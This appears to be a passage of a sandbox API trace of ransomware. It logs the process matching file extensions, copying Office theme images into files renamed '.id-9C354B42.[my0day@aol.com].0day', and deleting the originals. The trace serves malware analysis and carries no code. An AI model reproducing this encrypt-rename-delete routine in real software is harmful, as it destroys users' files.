[0046.504] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.504] lstrlenW (lpString=".xls") returned 4 [0046.504] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.504] lstrlenW (lpString=".xlsx") returned 5 [0046.504] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.504] lstrlenW (lpString=".ppt") returned 4 [0046.504] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.504] lstrlenW (lpString=".zip") returned 4 [0046.504] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.504] lstrlenW (lpString=".rar") returned 4 [0046.504] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.504] lstrlenW (lpString=".bz2") returned 4 [0046.504] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.505] lstrlenW (lpString=".7z") returned 3 [0046.505] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.505] lstrlenW (lpString=".dbf") returned 4 [0046.505] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.505] lstrlenW (lpString=".1cd") returned 4 [0046.505] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.505] lstrlenW (lpString=".jpg") returned 4 [0046.505] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.505] lstrlenW (lpString=".doc") returned 4 [0046.505] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.505] lstrlenW (lpString=".docx") returned 5 [0046.505] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.505] lstrlenW (lpString=".pdf") returned 4 [0046.505] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.505] lstrlenW (lpString=".xls") returned 4 [0046.505] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.505] lstrlenW (lpString=".xlsx") returned 5 [0046.505] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.505] lstrlenW (lpString=".ppt") returned 4 [0046.505] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.505] lstrlenW (lpString=".zip") returned 4 [0046.505] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.505] lstrlenW (lpString=".rar") returned 4 [0046.505] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.505] lstrlenW (lpString=".bz2") returned 4 [0046.505] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.506] lstrlenW (lpString=".7z") returned 3 [0046.506] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.506] lstrlenW (lpString=".dbf") returned 4 [0046.506] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.506] lstrlenW (lpString=".1cd") returned 4 [0046.506] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0046.506] lstrlenW (lpString=".jpg") returned 4 [0046.506] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.506] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0046.506] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.507] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=31975) returned 1 [0046.507] CloseHandle (hObject=0x174) returned 1 [0046.507] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 0x20 [0046.507] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.507] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.507] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.508] GetLastError () returned 0x0 [0046.508] ReadFile (in: hFile=0x174, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x7ce7, lpOverlapped=0x0) returned 1 [0046.510] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x7cf0, lpOverlapped=0x0) returned 1 [0046.511] ReadFile (in: hFile=0x174, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0046.511] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.511] SetEndOfFile (hFile=0x194) returned 1 [0046.511] CloseHandle (hObject=0x194) returned 1 [0046.511] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.511] SetEndOfFile (hFile=0x174) returned 1 [0046.512] CloseHandle (hObject=0x174) returned 1 [0046.512] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.512] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 1 [0046.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.513] lstrlenW (lpString=".doc") returned 4 [0046.513] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.513] lstrlenW (lpString=".docx") returned 5 [0046.513] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.513] lstrlenW (lpString=".pdf") returned 4 [0046.513] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.513] lstrlenW (lpString=".xls") returned 4 [0046.513] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.513] lstrlenW (lpString=".xlsx") returned 5 [0046.513] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.513] lstrlenW (lpString=".ppt") returned 4 [0046.513] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.513] lstrlenW (lpString=".zip") returned 4 [0046.513] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.513] lstrlenW (lpString=".rar") returned 4 [0046.513] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.513] lstrlenW (lpString=".bz2") returned 4 [0046.513] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.513] lstrlenW (lpString=".7z") returned 3 [0046.513] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.513] lstrlenW (lpString=".dbf") returned 4 [0046.513] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.513] lstrlenW (lpString=".1cd") returned 4 [0046.513] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.513] lstrlenW (lpString=".jpg") returned 4 [0046.513] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.514] lstrlenW (lpString=".doc") returned 4 [0046.514] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.514] lstrlenW (lpString=".docx") returned 5 [0046.514] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.514] lstrlenW (lpString=".pdf") returned 4 [0046.514] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.514] lstrlenW (lpString=".xls") returned 4 [0046.514] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.514] lstrlenW (lpString=".xlsx") returned 5 [0046.514] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.514] lstrlenW (lpString=".ppt") returned 4 [0046.514] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.514] lstrlenW (lpString=".zip") returned 4 [0046.514] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.514] lstrlenW (lpString=".rar") returned 4 [0046.514] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.514] lstrlenW (lpString=".bz2") returned 4 [0046.514] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.514] lstrlenW (lpString=".7z") returned 3 [0046.514] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.514] lstrlenW (lpString=".dbf") returned 4 [0046.514] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.514] lstrlenW (lpString=".1cd") returned 4 [0046.514] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0046.514] lstrlenW (lpString=".jpg") returned 4 [0046.514] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.515] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.515] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.515] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.515] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=4100) returned 1 [0046.515] CloseHandle (hObject=0x174) returned 1 [0046.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif")) returned 0x20 [0046.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.515] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.515] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.515] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.515] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.517] GetLastError () returned 0x0 [0046.517] ReadFile (in: hFile=0x174, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x1004, lpOverlapped=0x0) returned 1 [0046.519] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x1010, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x1010, lpOverlapped=0x0) returned 1 [0046.519] ReadFile (in: hFile=0x174, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0046.520] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.520] SetEndOfFile (hFile=0x194) returned 1 [0046.520] CloseHandle (hObject=0x194) returned 1 [0046.520] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.520] SetEndOfFile (hFile=0x174) returned 1 [0046.521] CloseHandle (hObject=0x174) returned 1 [0046.521] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.521] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif")) returned 1 [0046.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.521] lstrlenW (lpString=".doc") returned 4 [0046.521] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.521] lstrlenW (lpString=".docx") returned 5 [0046.521] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.521] lstrlenW (lpString=".pdf") returned 4 [0046.521] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.521] lstrlenW (lpString=".xls") returned 4 [0046.521] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.521] lstrlenW (lpString=".xlsx") returned 5 [0046.521] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.521] lstrlenW (lpString=".ppt") returned 4 [0046.521] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.522] lstrlenW (lpString=".zip") returned 4 [0046.522] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.522] lstrlenW (lpString=".rar") returned 4 [0046.522] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.522] lstrlenW (lpString=".bz2") returned 4 [0046.522] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.522] lstrlenW (lpString=".7z") returned 3 [0046.522] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.522] lstrlenW (lpString=".dbf") returned 4 [0046.522] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.522] lstrlenW (lpString=".1cd") returned 4 [0046.522] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.522] lstrlenW (lpString=".jpg") returned 4 [0046.522] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.522] lstrlenW (lpString=".doc") returned 4 [0046.522] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.522] lstrlenW (lpString=".docx") returned 5 [0046.522] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.522] lstrlenW (lpString=".pdf") returned 4 [0046.522] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.522] lstrlenW (lpString=".xls") returned 4 [0046.522] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.522] lstrlenW (lpString=".xlsx") returned 5 [0046.522] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.522] lstrlenW (lpString=".ppt") returned 4 [0046.522] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.523] lstrlenW (lpString=".zip") returned 4 [0046.523] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.523] lstrlenW (lpString=".rar") returned 4 [0046.523] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.523] lstrlenW (lpString=".bz2") returned 4 [0046.523] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.523] lstrlenW (lpString=".7z") returned 3 [0046.523] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.523] lstrlenW (lpString=".dbf") returned 4 [0046.523] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.523] lstrlenW (lpString=".1cd") returned 4 [0046.523] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0046.523] lstrlenW (lpString=".jpg") returned 4 [0046.523] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.523] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0046.523] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.523] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.523] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=47962) returned 1 [0046.524] CloseHandle (hObject=0x174) returned 1 [0046.524] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 0x20 [0046.524] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.524] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.524] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.524] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.524] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.524] GetLastError () returned 0x0 [0046.524] ReadFile (in: hFile=0x174, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xbb5a, lpOverlapped=0x0) returned 1 [0047.225] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xbb60, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xbb60, lpOverlapped=0x0) returned 1 [0047.245] ReadFile (in: hFile=0x174, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.245] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.245] SetEndOfFile (hFile=0x194) returned 1 [0047.246] CloseHandle (hObject=0x194) returned 1 [0047.246] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.246] SetEndOfFile (hFile=0x174) returned 1 [0047.247] CloseHandle (hObject=0x174) returned 1 [0047.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.247] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 1 [0047.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.247] lstrlenW (lpString=".doc") returned 4 [0047.248] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.248] lstrlenW (lpString=".docx") returned 5 [0047.248] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.248] lstrlenW 